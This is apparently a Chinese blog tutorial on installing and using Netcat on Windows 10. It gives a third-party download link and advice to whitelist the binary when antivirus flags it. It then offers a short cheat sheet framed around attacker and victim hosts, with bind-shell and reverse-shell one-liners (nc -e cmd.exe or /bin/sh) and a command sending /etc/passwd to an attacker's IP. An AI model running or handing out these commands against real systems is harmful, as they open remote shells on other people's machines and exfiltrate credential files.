Windows 10 安装和使用Netcat
Windows 10 安装和使用Netcat
简介:
Netcat简称nc,netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据,通过与其它工具结合和重定向,你可以在脚本中以多种方式使用它,使用netcat命令能够完成很多实验。
1.nc下载
网盘链接:https://pan.baidu.com/s/1BHfHtup3OlVxxSovhT1-xQ
提取码:nc12
2.解压到自定义文件夹

解压后的文件如图
3.按照使用指导将nc.exe文件复制到C:\Windows\System32文件中
这里杀毒软件可能会报错,把文件添加到信任区即可。
4.检测是否成功
win+r cmd打开两个命令行
分别输入指令:nc -l -p 7777 (对7777端口开启监听)
之后在下方输入 如果另外一个命令行能监听到即为成功。

nc localhost 7777 (对之前开启的监听进行检验)

这里可以成功进行监听。
| 参数 | 说明 |
|---|---|
| -d | 后台执行 |
| -e prog | 程序重定向,一旦连接,就执行 |
| -g gateway | 源路由跳数,最大值为8(source-routing hop point[s],up to 8) |
| -G num | 源路由指针:4,8,12,… (source-routing pointer: 4,8,12,…) |
| -h | 查看帮助信息 |
| -i secs | 延时的间隔 |
| -l | 监听模式,用于入站连接 |
| -n | 指定数字的IP地址,不能用hostname |
| -o file | 记录16进制的传输 |
| -p port | 本地端口号 |
| -r | 任意指定本地及远程端口 |
| -s addr | 本地源地址 |
| -u | UDP模式(netcat-1.15可以:远程nc -ulp port -e cmd.exe,本地nc -u ip port连接,得到一个shell. ) |
| -w secs | 指定超时的时间 |
| -z | 将输入输出关掉——用于扫描时 |
| -v | 详细输出——用两个-v可得到更详细的内容 |
基本用法
① 端口扫描:
nc -vv ip port
例:nc -vv 192.168.1.1 5000 扫描192.168.1.1的tcp 5000端口
nc -vv -w secs ip port-port
例:nc -vv -w 5 192.168.1.1 5000-5002
扫描192.168.1.1的5000-6000端口,网络超时的时间设为5秒
注意超时时间的单位是秒不是毫秒,另外nc这个用法的扫描效率远不及nmap
②正向连接
被攻击主机的需要是完整版的nc,有些版本的nc没有-e这个参数。
nc -l -p port -e cmd.exe #被攻击主机如果是windows
nc -l -p port -e /bin/sh #被攻击主机是linux
攻击者连接方式很简单:
nc ip port
③反向连接
攻击主机先开始监听端口:
nc -lvvp port
被攻击主机连接攻击者监听的端口:
nc -e cmd.exe ip port #被攻击主机如果是windows
nc -e /bin/sh ip port #被攻击主机是linux
④传送文件
攻击主机先开始监听:
nc -d -l -p port > tmp
被攻击主机再开始传送文件:
nc attack_ip port < /etc/passwd
⑤下载文件
攻击主机先开始监听:
nc -d -l -p port < tmp
被攻击主机再开始下载文件:
nc attack_ip port > tmp

浙公网安备 33010602011771号